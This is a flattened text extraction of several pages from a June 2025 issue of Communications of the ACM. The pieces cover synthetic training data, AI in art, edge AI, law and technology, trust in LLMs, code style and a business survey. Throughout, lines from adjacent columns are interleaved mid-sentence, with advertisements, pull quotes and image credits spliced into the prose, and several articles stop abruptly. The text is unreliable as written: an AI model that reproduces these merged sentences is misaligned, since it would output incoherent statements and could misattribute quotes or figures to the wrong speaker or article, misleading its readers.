Yunzhen Feng, a Ph.D. student at the pairing the best words together. That
Center for Data Science at New York same mechanism can be used to assess
Request a media kit University. As a rule, the performance of already-generated text to rate its qual-
neural networks improves as their size ity, with low-scoring results removed
increases. Naively mixing real and syn- or the highest-scoring result of several
and pricing: thetic data together, however, can slow attempts selected as the best. The idea
that improvement. “You can still ob- is similar to a method used to fine-
Ilia Rodriguez tune LLMs called reinforcement learn-
ing from human feedback (RLHF), in
+1 212-626-0686 “Model collapse which people provide examples of good
[email protected] happens when
results, thereby pushing the models to-
ward producing similar results. In this
you have multiple case, though, the LLM is generating its
own feedback.
steps, where each How well that works varies by case,
step depends on Feng said. The feedback can be im-
proved by having other LLMs assess
the output from the the same text and combining the re-
previous step.” sults from different models. Includ-
ing human assessments also improves
the outcomes, as does applying some
pre-written rules about what the out-
put should look like. Eliminating low-
er-quality results from the synthetic
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 13
news
AI and Art
If artificial intelligence is used to produce artworks,
should it be considered an artist?
A
R T I F IC I A L I N T E L L I G E NC E
increasingly is find-
(A I)
ing its way into art and
has become a hot-button
topic. Artists from all me-
diums emphatically support the use of
AI, saying it augments and enhances
their work, expanding what is possible.
They are unequivocal that they are still
the creators of their work and the AI is
not—but believe artists and technolo-
gy must learn to coexist harmoniously.
The reasons to use AI in different art
forms are compelling. A 2024 study by
the U.K.’s University College London
and University of Exeter found that
stories written with help from AI were
more creative, better written, and more
enjoyable. The research indicated that
writers with the most access to AI ex-
perienced the greatest creative gains,
with their stories scoring 8.1% higher
for novelty and 9% higher for useful-
ness than stories written without AI.
Deciding how to position AI in art is
in the eye of the beholder.
AI as an Extension of the Artist Artist Hugh Leeman used AI-generated images as photo references to paint from in his
AI is comprised of two ingredients: al- Change is Here series; this image is one of the results.
gorithms and data, and “both of these
are man-made,” said Tony Fernandes, ative and it isn’t art. It is just software based on my making realistic oil paint-
founder of HumanFocused.AI and working through logic and probability ings that are copies of AI-generated im-
CEO of UEGroup, a design company imitating its master in the only way it ages,’’ he explained. “This body of work
that employs artists. knows how: shallow imitation.” is meant to ask the viewer to consider
“People are fascinated to see what Hugh Leeman, an artist and lectur- the blurred boundaries between what
happens when both are allowed to run er who lectures regularly at Johns Hop- is human and what is machine, or what
on their own and to look at what they kins, Duke, and Colorado State uni- is natural and what is artificial.”
generated,’’ Fernandes said, adding versities, is using AI in the visual arts. The technology has enhanced the
that creating art requires inherent hu- In his studio art practice, Leeman has potential to create and collaborate in
man influence. created a body of work where half of the new ways, while raising questions that
“To say that AI creates art is to say paintings are made directly from his allow viewers to reflect on the current
that anyone can replicate the work of imagination, thus representing human changes in our world, Leeman said.
Picasso,” he said. “What makes Picas- creativity. AI was used to create images Leeman is clear that AI is “not yet
so’s work relevant is the human spirit, for the other half of the paintings. Lee- an artist because it is not sentient. It
imagination, and desire for expression. man then made photo-realistic paint- lacks emotions around pain, fears, and
Picasso experimented with cubism to ings based on those AI-generated im- fantasies, but it does offer us an incred-
ART WORK: HUGH LEEMA N
achieve something new. AI has no such ages, representing machine creativity. ible opportunity to collaborate with
motivation.” “The idea is that the viewer cannot an ever-growing ocean of images and
None of the AI processes have discern the difference between which possibilities. AI is becoming an exten-
spawned an entirely new art movement, paintings were made from my imagi- sion of the artists and their creativity in
Fernandes noted, “because it isn’t cre- nation and which ones were made ways that will only become clear as we
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 15
news
erations “will likely lose elements of become more blurred by the day, if not
agency of their creativity through the entirely indistinguishable, said Lee-
further merging of AI with humans man. “Consider the profound power of
ACM in our social ecosystem as well as our
physiology.”
art. Be it visual art or writing, its power
relates to society’s ability to construct
Speakers
creativity. Anil Doshi, one of the study’s and shape our perceptions of reality.”
authors, said that while the findings At some point, Leeman said, we must
indicate increased individual creativ- address the question of what will hap-
ity, “There is [the] risk of losing collec- pen when humans are no longer the
tive novelty. If the publishing industry sole creators of the images and stories
A great speaker were to embrace more generative AI- that shape our perceptions of reality.
inspired stories, our findings suggest Peker believes AI art will become
can make the that the stories would become less “even more interesting as artists and
difference between unique in aggregate and more similar
to each other.”
engineers collaborate on deeper, more
meaningful ways to use the technol-
a good event and Should AI Art Be Copyrighted?
ogy. Imagine dynamic art that evolves
with real-time data or interactive piec-
a WOW event! Alongside the discussion over AI’s role es where the artist and machine work
in art, there is a “gap” because the together in an almost symbiotic rela-
technology is evolving faster than the tionship.”
Take advantage of regulations and frameworks that gov- Perhaps the most practical way to
ern it, particularly when it comes to think about AI and the arts is to con-
ACM’s Distinguished intellectual property and authorship, sider the adage “If you can’t beat them,
said Peker. join them.” Rather than viewing AI-
Speakers Program She noted that the U.S. Copyright produced art as a threat, “We should
to invite renowned Office, for example, does not allow for see it as a tool for empowering human
AI-generated works to be copyrighted, creativity,” says Jeffrey “digitaljeff”
thought leaders in since only humans can hold copyright Castillo, a futurist, tech entrepreneur,
and the AI is not a human. and filmmaker. “AI may produce artifi-
academia, industry, “Even though AI cannot create art cial art, but tapping into human imagi-
and government to itself and requires a human to author nation and emotion will always yield
the prompts to generate visuals, the the most poignant, culturally relevant
deliver compelling unpredictability of AI’s output chal- works,’’ Castillo said. “The future of art
lenges the idea that these works can be depends not on AI vs. humans, but on
and insightful talks truly ‘authored’ by the individual who integrating our creative gifts to push
on the most important inputs the prompt,’’ Peker said. “This new frontiers of artistic expression.”
lack of legal clarity leaves a significant
topics in computing gray area in determining who the artist
Further Reading
is, and more importantly, how to pro-
and IT today. ACM tect creators’ rights.” Doshi, A.R. and Hauser, O.P.
will cover the cost This is an issue being faced by Colo- Generative AI enhances individual creativity
but reduces the collective diversity of novel
rado Springs, CO, artist Jason Allen,
of transportation for who caused a stir when he submitted
content. Science Advances. July 2024.
https://tinyurl.com/2ctftb4w
T
rail carrier
H I S Y E A R , U. S .
Amtrak will be installing
two novel inspection gate-
ways from Duos Technolo-
gies along its busy North-
east Corridor. The barn-like Duos
structures straddle railway tracks;
as passenger trains speed through
at up to 125 mph (201 kph), 97 cam-
eras and dozens of LED lights arrayed
around the sides, top, and bottom of
the tracks will capture thousands of
high-resolution images of the railcars.
These images are aggregated and pro-
cessed onsite in real time to present
a complete, 360-degree, highly de-
tailed view of the train. Artificial in-
telligence (AI) algorithms running on
Nvidia GPUs will analyze the images
locally; if the model flags a potential
structural or mechanical flaw, train The Duos portal aggregates and processes images from its 97 cameras onsite in real time,
personnel will be notified in less than providing a highly detailed view of each train passing through it.
a minute.
The Duos portal is one of many AI processors, like the on-device ver- There is computational capacity
new examples of what is loosely cate- sions from Qualcomm or those from available all the way from local devices
gorized as edge AI, or the deployment Hailo Inc., allow for real-time intelli- to the cloud, explained distributed AI
and operation of AI models outside of gent decision making, and there are researcher Lauri Lovén at the Univer-
massive cloud datacenters. multiple privacy and security benefits sity of Oulu in Finland. Exactly where
The precise definition of what con- to edge processing. These and other an AI model operates along this edge-
stitutes an edge varies. “There’s a factors have everyone from academic cloud continuum depends in part on
spectrum, from telecommunications computer scientists to technology gi- the use case. An autonomous vehicle
points of presence in major cities to ants racing to develop more efficient that has to make a rapid, real-time
smartwatches, smart home devices, means of pulling AI out of the cloud traffic decision is better off eliminat-
and Meta Ray-Bans,” says Shishir G. and closer to users. ing the cloud latency and generating
Patil, a Ph.D. student in computer sci- that result onboard. Conversely, a
ence at the University of California, consumer photo-editing application
Berkeley. “They all come under this The move to the edge powered by AI does not necessarily
pretty broad category of edge devices.” need to run on the user’s personal de-
Operating AI models at the edge reduces latency and vice—a latency-induced lag resulting
is challenging for a number of rea- eliminates the risk from spotty bandwidth would be per-
IMAGE COURTESY OF D UOS TECH NOLOGIES, INC. ( WW W.DUO ST ECH .COM)
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 17
news
can answer most of your questions, but in the tens of cents per inference, if
then maybe there’s one that needs to not higher, especially for the bigger
be solved by someone outside the class- Patil and his models. Basically, the cloud providers
room.” A more complex problem or colleagues are are going to be bleeding money if they
task could be pushed to a more robust give away inferences for free.” But if
AI model in the cloud for resolution. developing more AI tools operate on edge devices
Singh cites security and privacy as techniques to shrink, like smartphones, the cloud provider
equally important variables. If a pa- will assume less of the electricity bill.
tient visits a local health center for a fine-tune, and Instead, the user will pay that cost by
checkup, and machine learning al- personalize models charging their phones more often.
gorithms can process data collected The latest smartphones—consid-
during the exam within that facility, so they can run on ered the extreme edge—are now being
then privacy concerns are minimized. consumer edge optimized for edge AI. The recently re-
“If that patient data is stored and as- leased Pixel phones incorporate new
sessed locally, and not going to the devices. Google Tensor G4 chips designed spe-
cloud, that sensitive information re- cifically for AI workloads. The mod-
mains secure,” he explained. els running on these phones are also
Economics have become increas- shrinking. When Apple announced its
ingly important as well. A personal- Apple Intelligence features, the com-
ized AI agent that understands your pany noted that the language model
preferences might be too expensive tune, and personalize models so they running on the device would have
to operate in the cloud, noted Berke- can run on consumer hardware like roughly 3 billion parameters, com-
ley’s Patil, because this would require smartphones and other edge devices. pared to cloud-based models that run
reserving high-end cloud compute The cost of operating the models to hundreds of billions or even a tril-
capacity just for the individual user, in the cloud is also incentivizing AI lion-plus parameters. Similarly, Me-
who would have to pay the compute leaders and cloud giants to push more ta’s Llama 3.2 release included light-
costs to keep the model ready even tasks out to the edge, explained Patil. weight models with one billion and
when it is not in use. On the other As advanced AI models grow larger, three billion parameters designed to
hand, the costs of a general AI model they consume more electricity and run on devices.
maintained in the cloud for mass con- drive up the price of each inference. These smaller, purpose-built mod-
sumption can be distributed more The most advanced large language els are far more suitable to the edge.
efficiently across all its users. As a models (LLMs) are one obvious exam- An advanced generative text-to-video
result, Patil and his colleagues are ple, according to Patil. “LLM inference model like OpenAI’s Sora requires
developing techniques to shrink, fine- today is super expensive,” he said. “It’s significant cloud compute capacity,
Milestones
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 19
O
opinion
Inside Risks
Computer Science
and the Law
Making a case for stronger influence and
overlap of technology and law.
T
HERE W E R E T H R E E U.S. All three of these developments technical risks of deploying a complex
technical/legal develop- could be and were debated on purely cryptographic protocol, anywhere in
ments occurring in ap- legal or policy grounds. But there were the world (and many other countries
proximately 1993 that had also technical issues. Thus, one could have since expressed similar desires).
a profound effect on the argue on legal grounds that the Clip- Sure enough, Matt Blaze showed how
technology industry and on many per chip granted the U.S. government to abuse the Clipper chip to let it do
technologists. More such develop- unprecedented powers, powers argu- backdoor-free encryption, and at least
ments are occurring frequently. ably in violation of the Fourth Amend- two other mechanisms for adding
The three developments were tech- ment to the U.S. constitution. That, of backdoors to encryption protocols
nically unrelated. One was a bill before course, is a U.S. issue—but technolo- were shown to have flaws that allowed
the U.S. Congress for a standardized gists, including me, pointed out the malefactors to read data that others
wiretap interface in phone switches, a had encrypted.
concept that spread around the world These posed a problem: Debating
under the generic name “lawful inter- What are the some issues intelligently required not
cept.” The second was an update to just a knowledge of law or of technol-
the copyright statute to adapt to the implications for ogy, but of both. That is, some prob-
digital age. While there were some copyright law if a lems cannot be discussed purely on
useful changes—caching proxies and technical grounds or purely on legal
Internet service providers (ISPs) trans- system has to be grounds; the crux of the matter lies in
mitting copyrighted material were no trained on more the intersection.
longer to be held liable for making il- Consider, for example, the differ-
legal copies of protected content—it or less everything ence between content and metadata
provided an easy way for careless or available on the in a communication. Metadata alone
unscrupulous actors, including bots, is extremely powerful; indeed, Mi-
to request takedown of perfectly legal Internet? chael Hayden, former director of both
material. The third was the infamous the CIA and the NSA, once said, “We
Clipper chip, an encryption device kill people based on metadata.” The
that provided a backdoor for the U.S.— combination of content and metadata
and only the U.S.—government. is of course even more powerful. How-
ever, under U.S. law (and the legal rea- implications for copyright law if a sys- was only laughable, not defamatory—
soning is complex and controversial), tem has to be trained on more or less but what if it were libelous?
the content of a phone call is much everything available on the Internet? Many issues involve international
more strongly protected than the Does the Berne Convention cover it? law or conflicting laws between differ-
metadata: who called whom, when, Who is liable if an erroneous answer ent jurisdictions. How does one bal-
and for how long they spoke. But how (sometimes incorrectly called a “hallu- ance freedom of speech, a core U.S.
does this doctrine apply to the Inter- cination”) libels someone? I have re- value, with the very understandable
net, a network that provides far more peatedly asked one such system for my desire to ban pro-Nazi speech in much
powerful abilities to the endpoints in biography. It has consistently gotten of Europe? Who should reconcile
a conversation? (Metadata analysis is information wrong—including my the different legal standards? What
not an Internet-specific phenomenon. major, alma mater, year of gradua- should ISPs do? What is the effect on
The militaries of the world have likely tion, published books, and more— everyone else, if, say, a search engine
been using it for more than a century.) even though that information is readi- in a NATO country decides it has to
You cannot begin to answer that ques- ly available on my own website. Others suppress information on Tank Man at
tion without knowing not just how the have had similar experiences. This Tiananmen Square, but perhaps only
Internet actually works, but also the in certain countries? How do those
IMAGE BY AND RIJ BORYS ASSOCIAT ES, USING SH UTT ERSTOC K.COM
legal reasoning behind the difference. policies in turn interact with virtual
It took more than 100 pages for some Many issues involve private networks, content distribution
colleagues and I, three computer sci- networks, and more? How do those lo-
entists and a former federal prosecu- international law cation-sensitive answers interact with
tor, to show how the line between con- or conflicting laws privacy legislation?
tent and metadata can be drawn in There are many more very difficult
some cases (and that the Department between different questions at the border of law and tech-
of Justice’s manuals and some federal jurisdictions. nology. Is Internet voting a good idea?
judges got the line wrong), but that in There are obvious technical risks, but
other cases, there is no possible line.1 there is the social good of increasing
Newer technologies pose the same turnout and the technical challenge
sorts of risks. Consider today’s hottest of preserving ballot secrecy. There is
technology, generative AI. What are the also the technical ability for people to
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 21
opinion
verify their vote was counted, but only ogy are international; what is legal in the Legally Speaking column by Pamela
if sophisticated cryptographic meth- one place may not be in another—and Samuelson and the Law and Technol-
ods are used to cast votes. Computer how to find the boundary in a service ogy column by James Grimmelmann
crime? What is unauthorized access? offering is itself a difficult question. on important legal developments; in
Does iterating through sequence num- We need people who understand all addition, ACM conducts a regular con-
bers in a URL violate the law? How un- of this. More significantly, we need ference (Symposium on Computer Sci-
predictable must customer IDs be? Is people who can keep current in both ence and the Law). But the challenge
cryptanalyzing a bad pseudorandom fields, because both change. remains: educating people who under-
number generator illegal? Should it be, There is progress. There are annual stand not just technology, but also law,
if that ability is used to gain access to legal workshops on privacy and cyber- policy, ethics, and all in an internation-
customer profiles and thus to violate security; they welcome technical pa- al context. (For part of that, a broad, lib-
their privacy? How bad must that gen- pers, too. Communications publishes eral education is necessary.) Combined
erator be, if cracking it is to be legal? majors will help, but for many students
The risks can be civil. I know of an it is difficult to fit in enough courses in
incident where a corporate takeover We need people who both fields. That said, without such peo-
was stymied because the lawyers in- ple, we are all at the mercy of systems
volved did not understand IP address- understand all of this. mandated by well-meaning legislators
based geolocation. That is, their lack More significantly, who do not understand the technical
of technical knowledge caused them risks of their proposals.
trouble, and they were not even aware we need people who
of what they did not know. can keep current in Reference
1. Bellovin, S.M., Blaze, M., Landau, S., and Pell, S. It’s
All of these questions pose consid-
erable risks to society. Lawyers alone both fields, because too complicated: How the Internet upends Katz,
Smith, and electronic surveillance law. Harvard J. of
Law and Technology 30, 1 (Autumn 2016);
cannot answer them; for the most both change. https://bit.ly/4iBIf6p
part, they do not know the technology.
But technologists alone cannot an- Steven M. Bellovin ([email protected]) is a professor
of computer science and affiliate law faculty at Columbia
swer them, because for the most part University, New York, NY, USA.
they do not know the law. Besides, the
Internet and other forms of technol- © 2025 Copyright held by the owner/author(s).
The Profession of IT
In Large Language Models
We Trust?
Can large language models be trusted? Not likely.
Artificial neural networks offer a much better option.
I
“ F E V E RY B O DY A LWAY S lies to
you, the consequence is not that
you believe the lies, but rather
that nobody believes anything
any longer.” These words were
spoken by the political scientist and
philosopher Hannah Arendt in 1974.
She was discussing how totalitarian
governments, through their propagan-
da, might induce such wide cynicism
that people lose faith in the truth. Her
words resonate with today’s fears about
the dangers of rampant disinformation
generated by large language models
(LLMs) and spread by social media.
Today’s worry is not of a totalitarian
government, but a drift into a society
where people do not know what is true
and lose their trust in each other and in
the institutions that were established
to preserve stability. I offer here some lief you will honor our relationship, These three assessments are
reflections on trust and truth in the keeping me informed of any needed grounded in the history of our prom-
Internet with the aim of developing de- changes in our agreements and going ises to each other. In his book, Seven
fenses against this drift. out of your way to fulfill them should a Habits, Stephen Covey discusses the
challenging breakdown occur. Emotional Bank Account. Each ful-
Trust filled promise or act of kindness is a
IMAGE BY AND RIJ BORYS ASSOCIAT ES, USING SH UTT ERSTOC K.COM
In our social relations, trust means deposit. Each broken promise or in-
we believe a person will act with com- Many relationships, sensitive act is a withdrawal. Betrayals
petence, sincerity, and care. Suppose are expensive and damaging: It takes
I trust you. The competence assess- such as new ones only one or two to kill the trust earned
ment supports my belief you have the or interactions via a over many deposits. Unfortunately, by
skills and resources to do the job you reducing trust to the effects of transac-
promised. For if I doubt your skills website, must work tions, this metaphor hides the essence
or resources, I will not trust your at a low-trust level. of trust, which is that the parties take
promise. The sincerity assessment care of their relationship. If something
supports my belief you intend to ful- comes up that would violate their ex-
fill your promise. For if I doubt your pectations, they talk to modify their ex-
intent, I will not trust your promise. pectations to fit the new circumstance.
The care assessment supports my be- They will go to extraordinary lengths to
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 23
opinion
meet their expectation if a contingency rates as the clock speed is increased. Google searches now respond with an
or emergency arises. Their specs warn against running the “AI summary” which, because it was
Many relationships, such as new clock too fast. Well-engineered ma- generated by an LLM, might contain
ones or interactions via a website, must chines are likely to be trustworthy in hallucinations.
work at a low-trust level. Low-trust par- their operating ranges. My colleague Espen Anderson (Uni-
ties have a mutual agreement to follow LLMs challenge this standard engi- versity of Oslo) has suggested evaluating
basic transactional rules with precise neering practice. The problem is “hal- trust in the context of the kinds of jobs
protocols for requests, promises, and lucinations”—responses that contain LLMs can do. When would you hire (pay
declarations. Consider a purchase errors or fabrications, often presented money for) an LLM to do a job? LLMs
transaction with a merchant. The mer- as authoritative statements. Hallucina- can do three kinds of jobs: conversa-
chant offers a service at a price (declara- tions appear to be inherent in LLMs. tion, distillation, and fabrication. These
tion). The customer asks the merchant LLMs have no means to verify that distinctions can help focus when I am
to perform the service (request) and statements they generate are true. Us- willing to trust an LLM. I might trust an
agrees and make the payment (prom- ers are left to determine for themselves, LLM to have a companionate conversa-
ise). After the service is complete, the from other information available to tion with me, but not to provide accu-
customer ends the transaction with an them, whether an LLM output is truth- rate biographical information about
acceptance (another declaration). Af- ful. To date, researchers have been un- someone. I might trust an LLM to make
ter several successful transactions, the able to define “safe operating ranges” a useful summary of a book, but not to
customer and the merchant develop a for LLMs or to find internal constraints generate an accurate transcript of my
mutual confidence that the other will that eliminate hallucinations. It seems session with a doctor. I might trust an
do their part. A higher-trust relation- unlikely that anyone is going to find re- LLM to generate interesting new imag-
ship emerges. Now the merchant lets strictions on prompts that guarantee es, but not to prevent deepfakes.
the customer delay a payment or re- hallucination-free responses. It is more
ceive a customized service. A relation- likely that, through extensive testing, Truth
ship can evolve to high-trust when the an LLM can be rated with a hallucina- Trust issues with LLMs bring us to
competence and sincerity assessments tion likelihood. Early experiments of deeper and more difficult questions.
are taken for granted, and the belief this kind show the hallucination rate What is truth? Can we test whether
that the other will take care becomes can sometimes be driven down to ap- a claim is true? How does science do
unconditional. proximately 15%, which is still too high this? Science has evolved rigorous ap-
for critical applications. proaches to determining what is true
Taking It to the Machine How does a human know when an about nature. A good treatment of this
We take this understanding of trust to LLM hallucinates? Sometimes it is dynamic process can be found in the
machines by mapping the assessments obvious because the LLM response 1987 book Science in Action,a by the phi-
into testable metrics. A machine that makes no sense in the context of what losopher Bruno Latour.
passes all the tests is called trustwor- the human knows. More often it’s Latour’s main claim is that a hypoth-
thy. Competence maps to tests that a not obvious—for example when LLM esis moves from its birth as a specula-
machine meets all its technical speci- makes a claim and gives nonexistent tion or hunch to maturity as a settled
fications; the machine is competent if citations. In those cases, the human scientific fact by a social process of ac-
it behaves properly on every use and, in must consult other sources, for ex- cumulating allies. An ally is a person
case of failure, degrades gracefully. Sin- ample a Google search, seeking cor- who accepts the claim. Over a period of
cerity maps to tests that the machine’s roborating or refuting evidence. But experimentation and debate, the claim
builders have kept their word on the searching the Web for truth is prob- gains followers and loses dissenters.
machine’s functions, have been trans- lematic. Much information is incor- Claims that cannot withstand the as-
parent about the development process, rect and has been absorbed into the saults of doubters are discarded. Sci-
and have a following of satisfied cus- LLM when it is trained. In addition, ence has developed rigorous standards
tomers. Care is different. We cannot for when experimental results support
map care to machines because they claims. And, of course, any settled
cannot care at all. We take this claim is falsifiable—it can be reopened
This means we use machines in a if new, contrary evidence surfaces. In
low-trust mode, as enactors of trans- understanding of other words, scientific truths are social-
actions, without presuming that the trust to machines ly constructed as the scientific commu-
machine cares about any transaction nity tests claims and comes to agree-
or any customer. Machines can be very by mapping the ment that they hold.
useful even if they do not care about us. assessments into Some scientists are uncomfortable
We take great pains to learn the ma- with Latour’s claim that scientific facts
chine’s “safe operating range”—when testable metrics. are socially constructed. Science is sup-
it behaves according to expectation
and when it is likely to fail or generate a See B. Latour, Science in Action: How to Follow
errors. Chip-making provides an ex- Scientists and Engineers Through Society. Har-
ample. Chips are tested for their error vard University Press, Cambridge, MA (1987).
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 25
O
opinion
Kode Vicious
Analyzing Krazy Kode
Accounting for the emotional state of the person who wrote that code.
Dear KV,
Sometimes, when I am reading other
people’s code, I almost feel I can hear
what they were thinking. But then,
sometimes, it seems what they were
thinking was completely alien, or pos-
sibly even insane. Considering that
computer languages are more con-
strained than human ones, I am sur-
prised at the wide variation in the code
I am exposed to, even within the same
company or group.
Somehow, I thought that—with
things like modern coding standards—
code would start to look more alike, but
that seems to be all form and not func-
tion. How do you deal with all the vari-
ous codebases you must be exposed to?
Variously Confused
Dear Variously
IMAGE BY AND RIJ BORYS ASSOCIAT ES, USING PH OTOS BY T RUE TOUCH LIF EST YLE/SH UTT ERSTO CK. CO M
While recent languages that dictate and look at your own code and think this, then this, then this) and C, which
the form of the code—and here I am back on how you felt when you wrote it. remains his day-to-day language. That
thinking about Go and, to some extent, Anyone reading KV code will see is because KV angry code has a staccato
Rust—can enforce some visual simi- that it continues to be tinged with the feel to it—lots, of, short, variables, and
larity, the process of reading someone sins of his past writing in assembler (do comments. KV long ago learned not
else’s code is probably still more akin to only to check the spelling of his com-
psychoanalysis. This applies as well to ments but also to see if there were any
systems that reformat the visual repre- Variables and other things that might cause future
sentation before the code is committed embarrassment.b
for C and C++. KV often wonders if code functions are named KV’s only emotion besides anger is
annotations from the DSM-5 (Diagnostic logically, of course, calm, and calm code has a more playful
Standard Manual)a would be appropri- feel. Variables and functions are named
ate in a code review. but they may also logically, of course, but they may also
It is true that code can tell you a lot contain a bit of contain a bit of whimsy, along with
about a coder, including their age, what comments written in full, grammati-
language they write in most often, and whimsy. cally proper sentences.
their emotional state when the code Why should it matter if the code
was written. If you doubt me, go back was written when you were sad, mad,
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 27
ACM-PrintAd-2.25 x 9.5.indd 1 22/07/2021 10:25 PM
O
opinion
Opinion
What Is Programming?
... and what is programming in the age of artificial intelligence?
T
when visit-
WO Y E A R S AG O,
ing research colleagues in
Uppsala, Sweden, we were
asked a deceptively simple
question: “What does it mean
to program?” For context, one of us had
just completed academic education
and training in computer science and
was already deeply involved in actually
teaching introductory programming
(CS1). Arguably, he was (and still is) ca-
pable of programming. The other com-
pleted his Ph.D. degree in 2003 and has
been teaching programming (in various
forms) ever since. Yet, the question took
us by surprise; after all: “What is pro-
gramming?” To the reader, it may ap-
pear a ridiculous question to ask for two
reasons. You may find yourself having
a very clear and succinct definition and
conceptualization of (the idea of) pro- convenient for humans to a language ports the matters at hand; that is, an un-
gramming. Or, you may question what convenient for the computer. If we, as a derstanding of the “problem domain.”
value it brings to discuss such a trivial community, adopt these narrow defini- Thus, programming is not simply what
question. tions, the entirety of programming may is manifested as program code; it is also
However, we believe the answers well be made redundant by the cease- the knowledge of how the program in-
to this question may shed light on the lessly growing capabilities of generative teracts and develops alongside the do-
future of programming in the age of AI. However, during the 1970s, Donald main of the problem. Recently, Amy Ko
generative artificial intelligence (AI). Knuth, and similarly Edsger Dijkstra, et al. have taken this further and argued
We approach an answer to the ques- argued programming was something for the need to also consider the societal
tion by an exploration of the history of more.2,4 They argued programming impact of our programs, including limi-
computing as well as opinions among was the “art” of composing programs, tations, biases, and ethical consider-
contemporary introductory program- which requires awareness of aesthetics, ations embedded within the programs.5
ming educators. use of ingenuity, and inherent creativity. Thus, one can reduce programming
From this perspective, programming is to the act of writing instructions, but
In Theory, Programming Is ... more about composing pieces of code when taking the art and context into
Alan Blackwell’s work takes us through to solve a problem rather than writing consideration, it becomes more about
the historical definitions of program- individual lines of instructions. In 1985, the process of composing and con-
ming.1 Initially, it is presented as the Peter Naur further nuanced the view structing something that, in a sense,
process of drawing up the “schedule” of programming for problem solving.6 exists within a domain. Thus, current
IMAGE BY CRO MAGNON
for the sequence of individual opera- Specifically, he argued that a program’s definitions both encapsulate the act of
tions required to carry out a calcula- “life” depends on its developers foster- writing programs and the surrounding
tion. Later definitions expand this to the ing an understanding of how it [the ingenuity of composing pieces to solve
process of translating from a language program they develop or maintain] sup- problems.
a Obtained from a publicly available education- b For example, inductively identified keywords c Please note definitions are coded to multiple
al program repository: https://ug.dk such as “problem-solving” or “computer.” categories as they express multiple attributes.
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 29
opinion
Resources (OERs)
1. Blackwell, A.F. What is programming? In
Programming in the Age of AI Is ... Proceedings of the 14th Workshop of the Psychology of
While the definitions in literature Programming, 14. Citeseer (2002).
for a variety
2. Dijkstra, E.W. A short introduction to the art of
clearly emphasize the more impalpable programming. Vol. 4. Technische Hogeschool
qualities of programming, educators Eindhoven Eindhoven (1971).
Opinion
Thoughts about Some
Surprising AI-Era Technology
Readiness Findings
Nine steps can help spotlight, clarify, and
address risky digital governance gaps.
W
of
I T H T H E A S S I S TA NC E
Arthur D. Little and the
Cutter Consortium,
we surveyed business
executives about their
business-technology plans, readiness,
and priorities.a The results surprised
us—a lot. We learned that nearly 80%
of the companies still believe in some
form of the central control of technol-
ogy, and that only 5% of the companies
are decentralized, where the lines of
business are free to pursue technology
initiatives on their own. Slightly more
than half of the surveyed companies
do not track emerging technologies
or maintain technology watch lists.
Innovation? Only 17% of companies
have a well-funded, well-defined inno-
vation strategy, and 34% have no inno-
vation strategy at all.
What about artificial intelligence
(AI)—the technology driving major
changes in business models and pro- cesses? We discovered that only 20% respondents are in technology, 37% in
of companies define AI initiatives as senior management, and 14% in con-
a More than 70% of the 150+ respondents held high priority. Approximately 77% said sulting. The majority of respondents
senior positions, such as CEOs, CIOs, CFOs, they had only looked at generative AI are in the technology consulting (12%),
CTOs, SVP, EVPs, and senior IT management. (GenAI) briefly or not at all, and only financial services (12%), management
The majority of the respondents were from
North America (54%); Europe was second
26% of companies believe they are consulting (10%), and higher educa-
(24%). The industries that responded the most “ready” for AI. We assumed there was tion (8%). Expressed a little differently,
IMAGE BY VISUA L GENERATION
were financial services (15%) and computer more interest in AI than meets the eye, the survey was representative across
consulting (13%). Beyond that, there was rep- but the survey revealed that 27% of industries and executives.
resentation across many verticals split almost board directors have little or no inter-
evenly—40% of the companies have revenue of
$1M–$50M and more than 20% have revenue
est is AI, and 73% of boards have little Analysis and Interpretation
more than $50M; 30% have revenue exceeding or no interest in technology strategy. Like so many of us in the business-
$1B; and 8% have revenue more than $50B. The survey data revealed 30% of the technology world, we are accustomed
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 31
opinion
to failure. As we all know, technol- indicated that their companies still panies’ odds to deploy and leverage
ogy projects fail at astonishingly manage technology functions cen- emerging technologies.
high rates.4,5 The massive enterprise trally, and only 14% shared technology Boards of directors. Survey results
resource planning (ERP) business— management with the lines of busi- suggest that only 27% of the compa-
$75B by 2030—routinely experiences ness. These results indicate that nearly nies regard their boards as proactive.
failure—with the well-known Gartner 80% of the companies relied on tradi- More than 73% of companies report
Group’s failure rate estimate at 75%.2 tional “command and control” cen- that their boards are only reactive or
Customer relationship management tralization to manage the IT function. have little or no interest in technology
(CRM) programs fail at nearly the There is some good news. In al- strategy. That said, there is one area
same rate.3 Perhaps the harshest find- most 70% of the companies, the CIOs where boards are proactive and reac-
ing is that “90% fail to deliver any mea- and CTOs report directly to the CEO. tive: cybersecurity, where more than
surable ROI.”1 But despite high rates It appears that the days of IT report- 90% of boards are engaged in cyberse-
of failure, companies must leverage ing to CFOs (only 10%) and COOs (12%) curity threats and investments. These
emerging technology as the power of are over. This news is mixed, however, findings highlight the problematic
these technologies continues to rise. since reporting to the CEO reinforces gaps between executive decision mak-
While it was not one of the survey ques- centralized management, which has ing and board influence.
tions, we believed that the frequency huge implications for innovation. Cybersecurity. When asked about
of technology project failures would Technology adoption. The data also cybersecurity, the answers range from
drive more progressive approaches to suggests the majority (51%) of compa- self-described “innovators” to “unpre-
business-technology optimization. nies—including the ones that regard pared.” Remarkably, 29% of respon-
We expected to see survey results that technology as strategic—do not have dents selected either “insufficiently”
were “modern,” and at least tacitly ac- defined processes in place for adopt- or “don’t know” when asked about
knowledged that it’s time to do better. ing new emerging technology. This is their cybersecurity funding. Is cyber-
